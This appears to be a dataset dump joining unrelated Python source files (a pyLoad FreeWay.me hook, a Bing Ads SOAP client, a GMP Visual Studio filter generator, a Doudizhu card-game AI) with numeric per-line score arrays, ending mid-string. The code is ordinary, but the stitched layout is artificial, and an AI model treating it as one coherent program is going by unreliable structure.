[ "# -*- coding: utf-8 -*-\n", "\n", "from module.plugins.internal.MultiHook import MultiHook\n", "\n", "\n", "class FreeWayMeHook(MultiHook):\n", " __name__ = \"FreeWayMeHook\"\n", " __type__ = \"hook\"\n", " __version__ = \"0.18\"\n", " __status__ = \"testing\"\n", "\n", " __config__ = [(\"pluginmode\" , \"all;listed;unlisted\", \"Use for plugins\" , \"all\"),\n", " (\"pluginlist\" , \"str\" , \"Plugin list (comma separated)\", \"\" ),\n", " (\"reload\" , \"bool\" , \"Reload plugin list\" , True ),\n", " (\"reloadinterval\", \"int\" , \"Reload interval in hours\" , 12 )]\n", "\n", " __description__ = \"\"\"FreeWay.me hook plugin\"\"\"\n", " __license__ = \"GPLv3\"\n", " __authors__ = [(\"Nicolas Giese\", \"james@free-way.me\")]\n", "\n", "\n", " def get_hosters(self):\n", " user, info = self.account.select()\n", " hostis = self.load(\"http://www.free-way.bz/ajax/jd.php\",\n", " get={'id' : 3,\n", " 'user': user,\n", " 'pass': info['login']['password']}).replace(\"\\\"\", \"\") #@TODO: Revert to `https` in 0.4.10\n", " return [x.strip() for x in hostis.split(\",\") if x.strip()]\n" ]
[ 0, 0, 0, 0, 0, 0, 0.029411764705882353, 0.04, 0, 0.03571428571428571, 0, 0.0297029702970297, 0.039603960396039604, 0.04950495049504951, 0.039603960396039604, 0, 0, 0.03333333333333333, 0.015873015873015872, 0, 0, 0.037037037037037035, 0, 0, 0.023255813953488372, 0, 0.016260162601626018, 0 ]
28
0.013904
false
from suds.client import Client, Factory, WebFault, ObjectCache # noqa from .headerplugin import HeaderPlugin from .authorization import * from .service_info import SERVICE_INFO_DICT from .manifest import USER_AGENT from getpass import getuser from tempfile import gettempdir from os import path class ServiceClient: """ Provides an interface for calling the methods of the specified Bing Ads service.""" def __init__(self, service, version, authorization_data=None, environment='production', **suds_options): """ Initializes a new instance of this class. :param service: The service name. :type service: str :param authorization_data: (optional) The authorization data, if not provided, cannot call operations on service :type authorization_data: AuthorizationData or None :param environment: (optional) The environment name, can only be 'production' or 'sandbox', the default is 'production' :type environment: str :param version: to specify the service version :param suds_options: The suds options need to pass to suds client """ self._input_service = service self._input_environment = environment self._authorization_data = authorization_data self._refresh_oauth_tokens_automatically = True self._version = ServiceClient._format_version(version) # TODO This is a temp fix for set default suds temp folder with user info, suds development branch has already fixed it. if 'cache' not in suds_options: location = path.join(gettempdir(), 'suds', getuser()) suds_options['cache'] = ObjectCache(location, days=1) # set cachingpolicy to 1 to reuse WSDL cache files, otherwise will only reuse XML files if 'cachingpolicy' not in suds_options: suds_options['cachingpolicy'] = 1 self._options = suds_options self._service = ServiceClient._format_service(service) self._environment = ServiceClient._format_environment(environment) self.hp=HeaderPlugin() suds_options['plugins'] = [self.hp] self._soap_client = Client(self.service_url, **suds_options) def __getattr__(self, name): # Set authorization data and options before every service call. self.set_options(**self._options) return _ServiceCall(self, name) def get_response_header(self): return self.hp.get_response_header() def set_options(self, **kwargs): """ Set suds options, these options will be passed to suds. :param kwargs: suds options. :rtype: None """ self._options = kwargs kwargs = ServiceClient._ensemble_header(self.authorization_data, **self._options) self._soap_client.set_options(**kwargs) @property def authorization_data(self): """ Represents a user who intends to access the corresponding customer and account. :rtype: AuthorizationData """ return self._authorization_data @property def soap_client(self): """ The internal suds soap client. :rtype: Client """ return self._soap_client @property def factory(self): """ The internal suds soap client factory. :rtype: Factory """ return self.soap_client.factory @property def service_url(self): """ The wsdl url of service based on the specific service and environment. :rtype: str """ key = (self._service, self._environment) service_info_dict = ServiceClient._get_service_info_dict(self._version) if key not in service_info_dict: raise ValueError(str.format('Cannot find version: [v{0}] service: [{1}] under environment: [{2}]. \ Please notice that campaign management, bulk, ad intelligence and optimizer services were deprecated in v9', self._version, self._input_service, self._input_environment)) return service_info_dict[(self._service, self._environment)].url @property def refresh_oauth_tokens_automatically(self): """ A value indicating whether OAuth access and refresh tokens should be refreshed automatically upon access token expiration. :rtype: bool """ return self._refresh_oauth_tokens_automatically @refresh_oauth_tokens_automatically.setter def refresh_oauth_tokens_automatically(self, value): self._refresh_oauth_tokens_automatically = value @staticmethod def _ensemble_header(authorization_data, **kwargs): """ Ensemble the request header send to API services. :param authorization_data: the authorization data :type authorization_data: AuthorizationData :return: the ensemble request header :rtype: dict """ if 'soapheaders' in kwargs: raise Exception('cannot pass in kwargs contains soapheaders') if authorization_data is None: return kwargs headers = { 'DeveloperToken': authorization_data.developer_token, 'CustomerId': str(authorization_data.customer_id), 'CustomerAccountId': str(authorization_data.account_id), } authorization_data.authentication.enrich_headers(headers) http_headers = { 'User-Agent': USER_AGENT, } kwargs['soapheaders'] = headers kwargs['headers'] = http_headers return kwargs @staticmethod def _is_expired_token_exception(ex): if isinstance(ex, WebFault): if hasattr(ex.fault, 'detail') \ and hasattr(ex.fault.detail, 'AdApiFaultDetail') \ and hasattr(ex.fault.detail.AdApiFaultDetail, 'Errors') \ and hasattr(ex.fault.detail.AdApiFaultDetail.Errors, 'AdApiError'): ad_api_errors = ex.fault.detail.AdApiFaultDetail.Errors.AdApiError if type(ad_api_errors) == list: for ad_api_error in ad_api_errors: if ad_api_error.Code == '109': return True else: if ad_api_errors.Code == '109': return True return False @staticmethod def _format_service(service): """ Regularize the service name. The regularized service name contains only lower character without spaces. :param service: the service name :type service: str :return: the regularized service name :rtype: str """ service = service.strip().lower() service = service.replace('_', '') service = service.replace('-', '') service = service.replace(' ', '') if service.endswith('service'): service = service.replace('service', '') # remove postfix "service" if any return service @staticmethod def _format_version(version): """ format the version to a int value. :param version: :return: int version """ if version == 'v12' or version == 12: return 12 raise ValueError(str.format('version error: [{0}] is not supported.', version)) @staticmethod def _get_service_info_dict(version): """ Get the service information dict by version :param version: :return: the service info dict """ return SERVICE_INFO_DICT[version] @staticmethod def _format_environment(environment): """ Regularize the environment name. the regularized version contains only lower character without spaces. :param environment: the environment name :type environment: str :return: the regularized environment name :rtype: str """ environment = environment.strip().lower() return environment class _ServiceCall: """ This class wrapped method invocation on ServiceClient, add more logic to suds client call.""" def __init__(self, service_client, name): """ Initializes a new instance of this class. :param service_client: the service client need to be wrapped :type service_client: ServiceClient :param name: the method name :type name: str :return: the instance of this class :rtype: _ServiceCall """ self._service_client = service_client self._name = name def __call__(self, *args, **kwargs): need_to_refresh_token = False while True: if need_to_refresh_token: authentication = self.service_client.authorization_data.authentication if not isinstance(authentication, OAuthWithAuthorizationCode): raise ValueError( 'The type: {0} of authorization_data cannot refresh token automatically.', type(authentication).__name__ ) refresh_token = authentication.oauth_tokens.refresh_token authentication.request_oauth_tokens_by_refresh_token(refresh_token) self.service_client.set_options(**self.service_client._options) try: response = self.service_client.soap_client.service.__getattr__(self.name)(*args, **kwargs) return response except Exception as ex: if need_to_refresh_token is False \ and self.service_client.refresh_oauth_tokens_automatically \ and self.service_client._is_expired_token_exception(ex): need_to_refresh_token = True else: raise ex @property def service_client(self): """ The wrapped service client. :rtype: ServiceClient """ return self._service_client @property def name(self): """ The method name. :rtype: str """ return self._name import pkg_resources import types from suds.sudsobject import Property from suds.sax.text import Text _CAMPAIGN_MANAGEMENT_SERVICE_V12 = Client( 'file:///' + pkg_resources.resource_filename('bingads', 'v12/proxies/campaign_management_service.xml')) _CAMPAIGN_OBJECT_FACTORY_V12 = _CAMPAIGN_MANAGEMENT_SERVICE_V12.factory _CAMPAIGN_OBJECT_FACTORY_V12.object_cache = {} _CAMPAIGN_OBJECT_FACTORY_V12.create_without_cache = _CAMPAIGN_OBJECT_FACTORY_V12.create def _suds_objects_deepcopy(origin): if origin is None: return None origin_type = type(origin) if origin_type == Text: return origin if origin_type == list: new = [] for item in origin: new.append(_suds_objects_deepcopy(item)) return new if isinstance(origin, Property): new = origin_type(None) new.__metadata__ = origin.__metadata__ return new new = origin_type() for name in origin.__keylist__: setattr(new, name, _suds_objects_deepcopy(getattr(origin, name))) new.__metadata__ = origin.__metadata__ return new def _create_with_cache(self, name): if name not in self.object_cache: self.object_cache[name] = self.create_without_cache(name) obj = self.object_cache[name] copied_obj = _suds_objects_deepcopy(obj) return copied_obj
[ "from suds.client import Client, Factory, WebFault, ObjectCache # noqa\n", "\n", "from .headerplugin import HeaderPlugin\n", "from .authorization import *\n", "from .service_info import SERVICE_INFO_DICT\n", "from .manifest import USER_AGENT\n", "from getpass import getuser\n", "from tempfile import gettempdir\n", "from os import path\n", "\n", "\n", "class ServiceClient:\n", " \"\"\" Provides an interface for calling the methods of the specified Bing Ads service.\"\"\"\n", "\n", " def __init__(self, service, version, authorization_data=None, environment='production', **suds_options):\n", " \"\"\" Initializes a new instance of this class.\n", "\n", " :param service: The service name.\n", " :type service: str\n", " :param authorization_data: (optional) The authorization data, if not provided, cannot call operations on service\n", " :type authorization_data: AuthorizationData or None\n", " :param environment: (optional) The environment name, can only be 'production' or 'sandbox', the default is 'production'\n", " :type environment: str\n", " :param version: to specify the service version\n", " :param suds_options: The suds options need to pass to suds client\n", " \"\"\"\n", "\n", " self._input_service = service\n", " self._input_environment = environment\n", " self._authorization_data = authorization_data\n", " self._refresh_oauth_tokens_automatically = True\n", " self._version = ServiceClient._format_version(version)\n", "\n", " # TODO This is a temp fix for set default suds temp folder with user info, suds development branch has already fixed it.\n", " if 'cache' not in suds_options:\n", " location = path.join(gettempdir(), 'suds', getuser())\n", " suds_options['cache'] = ObjectCache(location, days=1)\n", " # set cachingpolicy to 1 to reuse WSDL cache files, otherwise will only reuse XML files\n", " if 'cachingpolicy' not in suds_options:\n", " suds_options['cachingpolicy'] = 1\n", " self._options = suds_options\n", "\n", " self._service = ServiceClient._format_service(service)\n", " self._environment = ServiceClient._format_environment(environment)\n", "\n", " self.hp=HeaderPlugin()\n", " suds_options['plugins'] = [self.hp]\n", " self._soap_client = Client(self.service_url, **suds_options)\n", "\n", " def __getattr__(self, name):\n", " # Set authorization data and options before every service call.\n", "\n", " self.set_options(**self._options)\n", " return _ServiceCall(self, name)\n", " \n", " def get_response_header(self):\n", " return self.hp.get_response_header()\n", "\n", " def set_options(self, **kwargs):\n", " \"\"\" Set suds options, these options will be passed to suds.\n", "\n", " :param kwargs: suds options.\n", " :rtype: None\n", " \"\"\"\n", "\n", " self._options = kwargs\n", " kwargs = ServiceClient._ensemble_header(self.authorization_data, **self._options)\n", " self._soap_client.set_options(**kwargs)\n", "\n", " @property\n", " def authorization_data(self):\n", " \"\"\" Represents a user who intends to access the corresponding customer and account.\n", "\n", " :rtype: AuthorizationData\n", " \"\"\"\n", "\n", " return self._authorization_data\n", "\n", " @property\n", " def soap_client(self):\n", " \"\"\" The internal suds soap client.\n", "\n", " :rtype: Client\n", " \"\"\"\n", "\n", " return self._soap_client\n", "\n", " @property\n", " def factory(self):\n", " \"\"\" The internal suds soap client factory.\n", "\n", " :rtype: Factory\n", " \"\"\"\n", "\n", " return self.soap_client.factory\n", "\n", " @property\n", " def service_url(self):\n", " \"\"\" The wsdl url of service based on the specific service and environment.\n", "\n", " :rtype: str\n", " \"\"\"\n", "\n", " key = (self._service, self._environment)\n", " service_info_dict = ServiceClient._get_service_info_dict(self._version)\n", " if key not in service_info_dict:\n", " raise ValueError(str.format('Cannot find version: [v{0}] service: [{1}] under environment: [{2}]. \\\n", " Please notice that campaign management, bulk, ad intelligence and optimizer services were deprecated in v9',\n", " self._version, self._input_service, self._input_environment))\n", " return service_info_dict[(self._service, self._environment)].url\n", "\n", "\n", " @property\n", " def refresh_oauth_tokens_automatically(self):\n", " \"\"\" A value indicating whether OAuth access and refresh tokens should be refreshed automatically upon access token expiration.\n", "\n", " :rtype: bool\n", " \"\"\"\n", " return self._refresh_oauth_tokens_automatically\n", "\n", " @refresh_oauth_tokens_automatically.setter\n", " def refresh_oauth_tokens_automatically(self, value):\n", " self._refresh_oauth_tokens_automatically = value\n", "\n", " @staticmethod\n", " def _ensemble_header(authorization_data, **kwargs):\n", " \"\"\" Ensemble the request header send to API services.\n", "\n", " :param authorization_data: the authorization data\n", " :type authorization_data: AuthorizationData\n", " :return: the ensemble request header\n", " :rtype: dict\n", " \"\"\"\n", "\n", " if 'soapheaders' in kwargs:\n", " raise Exception('cannot pass in kwargs contains soapheaders')\n", " if authorization_data is None:\n", " return kwargs\n", " headers = {\n", " 'DeveloperToken': authorization_data.developer_token,\n", " 'CustomerId': str(authorization_data.customer_id),\n", " 'CustomerAccountId': str(authorization_data.account_id),\n", " }\n", " authorization_data.authentication.enrich_headers(headers)\n", "\n", " http_headers = {\n", " 'User-Agent': USER_AGENT,\n", " }\n", "\n", " kwargs['soapheaders'] = headers\n", " kwargs['headers'] = http_headers\n", "\n", " return kwargs\n", "\n", " @staticmethod\n", " def _is_expired_token_exception(ex):\n", " if isinstance(ex, WebFault):\n", " if hasattr(ex.fault, 'detail') \\\n", " and hasattr(ex.fault.detail, 'AdApiFaultDetail') \\\n", " and hasattr(ex.fault.detail.AdApiFaultDetail, 'Errors') \\\n", " and hasattr(ex.fault.detail.AdApiFaultDetail.Errors, 'AdApiError'):\n", " ad_api_errors = ex.fault.detail.AdApiFaultDetail.Errors.AdApiError\n", " if type(ad_api_errors) == list:\n", " for ad_api_error in ad_api_errors:\n", " if ad_api_error.Code == '109':\n", " return True\n", " else:\n", " if ad_api_errors.Code == '109':\n", " return True\n", " return False\n", "\n", " @staticmethod\n", " def _format_service(service):\n", " \"\"\" Regularize the service name.\n", "\n", " The regularized service name contains only lower character without spaces.\n", "\n", " :param service: the service name\n", " :type service: str\n", " :return: the regularized service name\n", " :rtype: str\n", " \"\"\"\n", "\n", " service = service.strip().lower()\n", " service = service.replace('_', '')\n", " service = service.replace('-', '')\n", " service = service.replace(' ', '')\n", " if service.endswith('service'):\n", " service = service.replace('service', '') # remove postfix \"service\" if any\n", " return service\n", "\n", " @staticmethod\n", " def _format_version(version):\n", " \"\"\"\n", " format the version to a int value.\n", " :param version:\n", " :return: int version\n", " \"\"\"\n", " if version == 'v12' or version == 12:\n", " return 12\n", " raise ValueError(str.format('version error: [{0}] is not supported.', version))\n", "\n", "\n", " @staticmethod\n", " def _get_service_info_dict(version):\n", " \"\"\"\n", " Get the service information dict by version\n", " :param version:\n", " :return: the service info dict\n", " \"\"\"\n", " return SERVICE_INFO_DICT[version]\n", "\n", " @staticmethod\n", " def _format_environment(environment):\n", " \"\"\" Regularize the environment name.\n", "\n", " the regularized version contains only lower character without spaces.\n", "\n", " :param environment: the environment name\n", " :type environment: str\n", " :return: the regularized environment name\n", " :rtype: str\n", " \"\"\"\n", "\n", " environment = environment.strip().lower()\n", " return environment\n", "\n", "\n", "class _ServiceCall:\n", " \"\"\" This class wrapped method invocation on ServiceClient, add more logic to suds client call.\"\"\"\n", "\n", " def __init__(self, service_client, name):\n", " \"\"\" Initializes a new instance of this class.\n", "\n", " :param service_client: the service client need to be wrapped\n", " :type service_client: ServiceClient\n", " :param name: the method name\n", " :type name: str\n", " :return: the instance of this class\n", " :rtype: _ServiceCall\n", " \"\"\"\n", "\n", " self._service_client = service_client\n", " self._name = name\n", "\n", " def __call__(self, *args, **kwargs):\n", " need_to_refresh_token = False\n", " while True:\n", " if need_to_refresh_token:\n", " authentication = self.service_client.authorization_data.authentication\n", " if not isinstance(authentication, OAuthWithAuthorizationCode):\n", " raise ValueError(\n", " 'The type: {0} of authorization_data cannot refresh token automatically.',\n", " type(authentication).__name__\n", " )\n", " refresh_token = authentication.oauth_tokens.refresh_token\n", " authentication.request_oauth_tokens_by_refresh_token(refresh_token)\n", " self.service_client.set_options(**self.service_client._options)\n", " try:\n", " response = self.service_client.soap_client.service.__getattr__(self.name)(*args, **kwargs)\n", " return response\n", " except Exception as ex:\n", " if need_to_refresh_token is False \\\n", " and self.service_client.refresh_oauth_tokens_automatically \\\n", " and self.service_client._is_expired_token_exception(ex):\n", " need_to_refresh_token = True\n", " else:\n", " raise ex\n", "\n", " @property\n", " def service_client(self):\n", " \"\"\" The wrapped service client.\n", "\n", " :rtype: ServiceClient\n", " \"\"\"\n", "\n", " return self._service_client\n", "\n", " @property\n", " def name(self):\n", " \"\"\" The method name.\n", "\n", " :rtype: str\n", " \"\"\"\n", "\n", " return self._name\n", "\n", "\n", "import pkg_resources\n", "import types\n", "from suds.sudsobject import Property\n", "from suds.sax.text import Text\n", "\n", "\n", "_CAMPAIGN_MANAGEMENT_SERVICE_V12 = Client(\n", " 'file:///' + pkg_resources.resource_filename('bingads', 'v12/proxies/campaign_management_service.xml'))\n", "_CAMPAIGN_OBJECT_FACTORY_V12 = _CAMPAIGN_MANAGEMENT_SERVICE_V12.factory\n", "_CAMPAIGN_OBJECT_FACTORY_V12.object_cache = {}\n", "_CAMPAIGN_OBJECT_FACTORY_V12.create_without_cache = _CAMPAIGN_OBJECT_FACTORY_V12.create\n", "\n", "\n", "def _suds_objects_deepcopy(origin):\n", " if origin is None:\n", " return None\n", " origin_type = type(origin)\n", " if origin_type == Text:\n", " return origin\n", " if origin_type == list:\n", " new = []\n", " for item in origin:\n", " new.append(_suds_objects_deepcopy(item))\n", " return new\n", " if isinstance(origin, Property):\n", " new = origin_type(None)\n", " new.__metadata__ = origin.__metadata__\n", " return new\n", " new = origin_type()\n", " for name in origin.__keylist__:\n", " setattr(new, name, _suds_objects_deepcopy(getattr(origin, name)))\n", " new.__metadata__ = origin.__metadata__\n", " return new\n", "\n", "\n", "def _create_with_cache(self, name):\n", " if name not in self.object_cache:\n", " self.object_cache[name] = self.create_without_cache(name)\n", " obj = self.object_cache[name]\n", " copied_obj = _suds_objects_deepcopy(obj)\n", " return copied_obj\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010869565217391304, 0, 0.009174311926605505, 0, 0, 0, 0, 0.008264462809917356, 0, 0.0078125, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.007751937984496124, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011111111111111112, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0.008928571428571428, 0.008264462809917356, 0.00980392156862745, 0, 0, 0, 0.07142857142857142, 0, 0.007407407407407408, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011363636363636364, 0, 0, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.00980392156862745, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0.010101010101010102, 0, 0, 0, 0.011904761904761904, 0, 0, 0.009345794392523364, 0, 0, 0, 0.011764705882352941, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.047619047619047616, 0.07692307692307693, 0.02702702702702703, 0.03225806451612903, 0, 0, 0, 0.009259259259259259, 0, 0, 0.011363636363636364, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
329
0.002497
false
# generate Visual Studio IDE Filter from os import makedirs from os.path import dirname, normpath, join, split, relpath from errno import EEXIST def filter_folders(cf_list, af_list, outf): f1 = r''' <ItemGroup> <Filter Include="Header Files" /> <Filter Include="Source Files" /> ''' f2 = r''' <Filter Include="Source Files\{0:s}" /> ''' f3 = r''' </ItemGroup> ''' c_dirs = set(i[2] for i in cf_list) a_dirs = set(i[2] for i in af_list) if a_dirs: c_dirs |= set((r'mpn\yasm',)) outf.write(f1) for d in sorted(c_dirs): if d: t = d if d != r'mpn\generic' else r'mpn' outf.write(f2.format(t)) outf.write(f3) def filter_headers(hdr_list, relp, outf): f1 = r''' <ItemGroup> ''' f2 = r''' <ClInclude Include="{}{}"> <Filter>Header Files</Filter> </ClInclude> ''' f3 = r''' </ItemGroup> ''' outf.write(f1) for h in hdr_list: outf.write(f2.format(relp, h)) outf.write(f3) def filter_csrc(cf_list, relp, outf): f1 = r''' <ItemGroup> ''' f2 = r''' <ClCompile Include="{}{}"> <Filter>Source Files</Filter> </ClCompile> ''' f3 = r''' <ClCompile Include="{}{}\{}"> <Filter>Source Files\{}</Filter> </ClCompile> ''' f4 = r''' </ItemGroup> ''' outf.write(f1) for i in cf_list: if not i[2]: outf.write(f2.format(relp, i[0] + i[1])) else: t = 'mpn' if i[2].endswith('generic') else i[2] outf.write(f3.format(relp, i[2], i[0] + i[1], t)) outf.write(f4) def filter_asrc(af_list, relp, outf): f1 = r''' <ItemGroup> ''' f2 = r''' <YASM Include="{0:s}{2:s}\{1:s}"> <Filter>Source Files\mpn\yasm</Filter> </YASM> ''' f3 = r''' </ItemGroup> ''' outf.write(f1) for i in af_list: outf.write(f2.format(relp, i[0] + i[1], i[2], i[2])) outf.write(f3) def gen_filter(path, root_dir, hf_list, cf_list, af_list, tools_ver): f1 = r'''<?xml version="1.0" encoding="utf-8"?> <Project ToolsVersion="{0}" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> '''.format(tools_ver) f2 = r''' <ItemGroup> <None Include="..\..\gmp-h.in" /> </ItemGroup> </Project> ''' relp = split(relpath(root_dir, path))[0] + '\\' try: makedirs(split(path)[0]) except IOError as e: if e.errno != EEXIST: raise else: pass with open(path, 'w') as outf: outf.write(f1) filter_folders(cf_list, af_list, outf) if hf_list: filter_headers(hf_list, relp, outf) filter_csrc(cf_list, relp, outf) if af_list: filter_asrc(af_list, relp, outf) outf.write(f2)
[ "# generate Visual Studio IDE Filter\n", "\n", "from os import makedirs\n", "from os.path import dirname, normpath, join, split, relpath\n", "from errno import EEXIST\n", "\n", "def filter_folders(cf_list, af_list, outf):\n", "\n", " f1 = r''' <ItemGroup>\n", " <Filter Include=\"Header Files\" />\n", " <Filter Include=\"Source Files\" />\n", "'''\n", " f2 = r''' <Filter Include=\"Source Files\\{0:s}\" />\n", "'''\n", " f3 = r''' </ItemGroup>\n", "'''\n", " c_dirs = set(i[2] for i in cf_list)\n", " a_dirs = set(i[2] for i in af_list)\n", " if a_dirs:\n", " c_dirs |= set((r'mpn\\yasm',))\n", " outf.write(f1)\n", " for d in sorted(c_dirs):\n", " if d:\n", " t = d if d != r'mpn\\generic' else r'mpn'\n", " outf.write(f2.format(t))\n", " outf.write(f3)\n", "\n", "def filter_headers(hdr_list, relp, outf):\n", "\n", " f1 = r''' <ItemGroup>\n", "'''\n", " f2 = r''' <ClInclude Include=\"{}{}\">\n", " <Filter>Header Files</Filter>\n", " </ClInclude>\n", "'''\n", " f3 = r''' </ItemGroup>\n", "'''\n", " outf.write(f1)\n", " for h in hdr_list:\n", " outf.write(f2.format(relp, h))\n", " outf.write(f3)\n", "\n", "def filter_csrc(cf_list, relp, outf):\n", "\n", " f1 = r''' <ItemGroup>\n", "'''\n", " f2 = r''' <ClCompile Include=\"{}{}\">\n", " <Filter>Source Files</Filter>\n", " </ClCompile>\n", "'''\n", " f3 = r''' <ClCompile Include=\"{}{}\\{}\">\n", " <Filter>Source Files\\{}</Filter>\n", " </ClCompile>\n", "'''\n", " f4 = r''' </ItemGroup>\n", "'''\n", " outf.write(f1)\n", " for i in cf_list:\n", " if not i[2]:\n", " outf.write(f2.format(relp, i[0] + i[1]))\n", " else:\n", " t = 'mpn' if i[2].endswith('generic') else i[2]\n", " outf.write(f3.format(relp, i[2], i[0] + i[1], t))\n", " outf.write(f4)\n", "\n", "def filter_asrc(af_list, relp, outf):\n", "\n", " f1 = r''' <ItemGroup>\n", "'''\n", " f2 = r''' <YASM Include=\"{0:s}{2:s}\\{1:s}\">\n", " <Filter>Source Files\\mpn\\yasm</Filter>\n", " </YASM>\n", "'''\n", " f3 = r''' </ItemGroup>\n", "'''\n", " outf.write(f1)\n", " for i in af_list:\n", " outf.write(f2.format(relp, i[0] + i[1], i[2], i[2]))\n", " outf.write(f3)\n", "\n", "def gen_filter(path, root_dir, hf_list, cf_list, af_list, tools_ver):\n", "\n", " f1 = r'''<?xml version=\"1.0\" encoding=\"utf-8\"?>\n", "<Project ToolsVersion=\"{0}\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n", "'''.format(tools_ver)\n", "\n", " f2 = r''' <ItemGroup>\n", " <None Include=\"..\\..\\gmp-h.in\" />\n", " </ItemGroup>\n", "</Project>\n", "'''\n", "\n", " relp = split(relpath(root_dir, path))[0] + '\\\\'\n", " try:\n", " makedirs(split(path)[0])\n", " except IOError as e:\n", " if e.errno != EEXIST:\n", " raise\n", " else:\n", " pass\n", "\n", " with open(path, 'w') as outf:\n", "\n", " outf.write(f1)\n", " filter_folders(cf_list, af_list, outf)\n", " if hf_list:\n", " filter_headers(hf_list, relp, outf)\n", " filter_csrc(cf_list, relp, outf)\n", " if af_list:\n", " filter_asrc(af_list, relp, outf)\n", " outf.write(f2)\n" ]
[ 0, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0.04, 0, 0, 0, 0.01818181818181818, 0, 0.038461538461538464, 0, 0.02631578947368421, 0.02631578947368421, 0.07692307692307693, 0, 0.058823529411764705, 0.037037037037037035, 0, 0.02127659574468085, 0.03225806451612903, 0.058823529411764705, 0, 0.023809523809523808, 0, 0.04, 0, 0.023809523809523808, 0, 0, 0, 0.038461538461538464, 0, 0.058823529411764705, 0.047619047619047616, 0, 0.058823529411764705, 0, 0.02631578947368421, 0, 0.04, 0, 0.023809523809523808, 0, 0, 0, 0.022222222222222223, 0, 0, 0, 0.038461538461538464, 0, 0.058823529411764705, 0.05, 0, 0.02127659574468085, 0, 0.018518518518518517, 0.017857142857142856, 0.058823529411764705, 0, 0.02631578947368421, 0, 0.04, 0, 0.02040816326530612, 0, 0, 0, 0.038461538461538464, 0, 0.058823529411764705, 0.05, 0, 0.058823529411764705, 0, 0.014285714285714285, 0, 0.02, 0.011235955056179775, 0, 0, 0.04, 0, 0, 0, 0, 0, 0.02, 0.14285714285714285, 0, 0.043478260869565216, 0, 0.08333333333333333, 0, 0.09090909090909091, 0, 0.03125, 0, 0, 0, 0, 0.023809523809523808, 0, 0, 0.02564102564102564, 0 ]
111
0.017696
false
import clr, sys, types clr.AddReference('System') clr.AddReference('ZyGames.Framework.Common'); clr.AddReference('ZyGames.Framework') clr.AddReference('ZyGames.Framework.Game') clr.AddReference('ZyGames.Doudizhu.Model') from ZyGames.Framework.Common.Log import * from System.Collections.Generic import * from ZyGames.Doudizhu.Model import * from ZyGames.Framework.Cache.Generic import * from ZyGames.Framework.Game.Cache import * class CardVector(): """牌储存结构,ex:2:[202,102],3:[203,103]""" def __init__(self, type): """@type:结构类型wang,bomb,shun,three,two,one""" self.__type = type self.__data = {} def addChild(self, vector): key = vector.__type if key: self.__data[key] = vector def len(self): return len(self.__data.keys()) def add(self, key, cards): self.__data[key] = cards def hasKey(self, key): return self.__data.has_key(key) def get(self, key): return self.__data[key] def remove(self, key): del self.__data[key] def clear(self): return self.__data.clear() def getItems(self): return self.__data.items() def getKeys(self): keys = self.__data.keys() keys.sort() return keys def getFirstVal(self): keys = self.getKeys() if len(keys) > 0: return self.get(keys[0]) return None def getLasttVal(self): keys = self.getKeys() if len(keys) > 0: return self.get(keys[len(keys)-1]) return None def getGreaterThan(self, k): """取出大于k的牌->obj或[]""" keys = self.getKeys() for key in keys: if key > k: return self.get(key) return [] def getMaxGreaterThan(self, k): """取出大于k的最大的牌->obj或[]""" keys = self.getKeys() for i in range(len(keys)-1, -1,-1): key = keys[i] if key > k: return self.get(key) return [] def getList(self): list = [] keys = self.getKeys() for key in keys: val = self.get(key) if type(val) == types.ListType: for t in val: list.append(t) else: list.append(val) return list def getIndexVal(self, index): keys = self.getKeys() if len(keys) > index: return self.get(keys[index]) return None class AIConfig(): @staticmethod def getConfig(name): return AIConfig.__config[name] __config = { "nickName": ['雪舞№枫红','夜舞&倾城','魅影い冰绝','残恋々ら','匰身ァ饚З','走鐹菂蕗_','无语づ肴','传じ☆ve说','恋☆鵷:鶵','≮梦★羽≯','莞镁主题曲〃','o┢┦apΡy','幽魂邀絮】','So丶滚吧','無話可說。','花╮开一夏','▋潶禮菔▍','倾世恋流年','訫侑所属丶','命里缺沵','柔情似水似','淫大代表','钢茎混凝凸','∫安雅轩 *','查 无 此 人','上帝是个妞','_她入他心','___髅ㄦ〤','三分淑女范','﹋落花伊人','吃货不痴货','〃逢床作戏╮','屌丝先森 ぃ','资格让皒哭','╰︶情兽〤','得瑟的尛孩纸','好小伙中国造','情非得已り','夏兮兮°','等着你来宠','安小夕 ▽','堇色流年丿','如歌亦如梦','墨染锦年╮','独自沉沦 